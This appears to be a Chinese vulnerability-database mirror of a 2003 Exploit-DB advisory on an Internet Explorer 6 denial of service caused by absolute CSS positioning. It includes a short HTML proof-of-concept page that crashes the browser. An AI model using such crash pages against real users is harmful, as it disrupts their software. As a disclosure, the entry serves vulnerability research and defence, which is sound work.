Microsoft Internet Explorer 6 – Absolute Position Block Denial of Service

Microsoft Internet Explorer 6 – Absolute Position Block Denial of Service

漏洞ID 1054210 漏洞类型
发布时间 2003-10-03 更新时间 2003-10-03
图片[1]-Microsoft Internet Explorer 6 – Absolute Position Block Denial of Service-安全小百科CVE编号 N/A
图片[2]-Microsoft Internet Explorer 6 – Absolute Position Block Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23215
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8758/info

A problem has been reported in Microsoft Internet Explorer when absolute positioning is used. Because of this, it may be possible to deny service to users of the browser. This issue may be due to memory corruption, however, it is known not at this point if it may be exploited to execute arbitrary code.

It has been reported that the exploit code for this issue may also cause Eudora to crash. This may simply be due to Internet Explorer being set to render HTML content for Eudora.

<html>
<body>
<style type="text/css">
#three {
position: absolute;
}
#one #two {
position: absolute;
}
</style>
<div id="one">
In 'one'
<span id="two">
In 'two'
</div>
<div id="three">
In 'three'
</div>
</body>

相关推荐: OpenBSD isakmpd IKE Payloads Denial Of Service Vulnerability

OpenBSD isakmpd IKE Payloads Denial Of Service Vulnerability 漏洞ID 1101817 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 2002-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享